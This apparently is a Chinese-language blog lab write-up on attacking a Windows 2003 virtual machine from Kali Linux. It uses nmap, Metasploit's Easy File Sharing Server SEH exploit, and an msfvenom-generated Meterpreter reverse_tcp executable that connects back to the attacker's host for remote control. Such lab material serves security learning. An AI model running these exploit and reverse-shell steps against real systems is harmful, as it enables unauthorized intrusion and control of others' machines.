远程控制Windows实验

一、easy file sharing server漏洞复现

实验环境

攻击机:kali Linux 192.168.114.134

被攻击机:Windows2003 192.168.114.145


nmap -sV 192.168.114.0/24,扫描靶机,看它的ip、开放端口和开启的服务。

可以看见扫描到了靶机在8080端口开启了这个服务。

在kali的漏洞库找找有没有这个漏洞的exp

msfconsole
search easy file sharing
use exploit/windows/http/easyfilesharing_seh
set rhost	//设置攻击目标的ip
set rport	//设置要攻击的端口
exploit		//攻击

存在对应版本漏洞的exp,利用这个脚本来实施攻击。

打开靶机的计算器


二、metasploit的应用

实验环境

靶机:Windows2003 192.168.114.145

攻击机:kali Linux 192.168.114.134

在kali中生成被控端

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.114.134 lport=7777 -f exe -o /home/payload.exe


在kali中启动主控端

msfconsole打开msf

当靶机运行了这个可执行文件,这个时候攻击机就可以控制靶机了。

下载文件

posted @ 2023-12-24 13:01  bl0ck  阅读(26)  评论(0)    收藏  举报